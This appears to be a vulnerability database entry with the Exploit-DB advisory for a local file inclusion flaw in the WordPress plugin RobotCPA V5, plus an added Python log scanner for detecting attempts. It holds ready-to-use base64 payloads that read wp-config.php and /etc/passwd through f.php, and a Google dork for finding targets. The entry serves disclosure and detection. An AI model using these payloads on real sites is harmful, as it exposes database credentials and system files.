Vendor: RobotCPA
By: T3N38R15
CVSS: 8.8 HIGH
Local File Include
CWE: 98
Product Name: RobotCPA
Affected Version From: V5
Affected Version To: V5
Patch Exists: NO
Related CWE: N/A
CPE: a:robot-cpa:robotcpa
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2015

WordPress Plugin RobotCPA V5 – Local File Include

The affected file is f.php, and its GET parameter 'l' is vulnerable to local file inclusion. The injection only needs to be base64-encoded: a value such as 'php://filter/resource=./../../../wp-config.php' or 'file:///etc/passwd' is encoded and then used in a URL like 'http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk' (the encoded form of 'file:///etc/passwd') to view the content of the passwd file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file path.
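
No patch exists, so reviewing web server logs for the request pattern described above is a practical check. The following is an added example, not part of the original advisory or the plugin: it finds requests to f.php, base64-decodes the 'l' parameter and flags values that name a PHP stream wrapper, an absolute path or a parent directory. The combined log format, the wrapper list and the sample log lines are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Decoded values naming a PHP stream wrapper, an absolute path or a parent directory.
SUSPICIOUS_RE = re.compile(r'^(?:php|file|data|expect|zip|phar|glob):|^/|\.\./|\.\.\\', re.IGNORECASE)
PLUGIN_PATH = "/wp-content/plugins/robotcpa/f.php"  # path given in the advisory


def decode_l(value):
    """Base64-decode an 'l' value leniently; return None if it is not base64."""
    value = value.replace(" ", "+")      # parse_qs turns '+' into a space
    value += "=" * (-len(value) % 4)     # restore padding stripped from the URL
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:                   # binascii.Error is a ValueError subclass
        return None


def scan(lines):
    """Return (line_number, decoded_value) for each suspicious request to f.php."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith(PLUGIN_PATH):
            continue
        for raw in parse_qs(url.query).get("l", []):
            decoded = decode_l(raw)
            if decoded is not None and SUSPICIOUS_RE.search(decoded):
                hits.append((number, decoded))
    return hits


# Constructed sample log lines (documentation IP ranges, made-up timestamps and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2015:10:01:02 +0000] "GET /wp-content/plugins/robotcpa/f.php?l=b2ZmZXItMTIz HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Jun/2015:10:01:05 +0000] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 200 1843',
    '198.51.100.9 - - [10/Jun/2015:10:01:09 +0000] "GET /wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA%3D%3D HTTP/1.1" 200 3120',
    '203.0.113.7 - - [10/Jun/2015:10:02:00 +0000] "GET /index.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, decoded in scan(SAMPLE_LOG):
        print(f"line {number}: l decodes to {decoded!r}")
```

A 200 response with an unusually large body on a flagged line is worth prioritising, since it suggests file contents were returned.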

Exploit-DB raw data:

# Exploit Title: WordPress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox), Linux (Firefox)
The affected file is f.php and the GET parameter "l" is vulnerable to local file inclusion.
We just need to base64-encode our injection.
Like this:
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk

Our injection then looks like this:
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and we can see the content of the passwd file.

Greets to Black Sniper
Regards, T3N38R15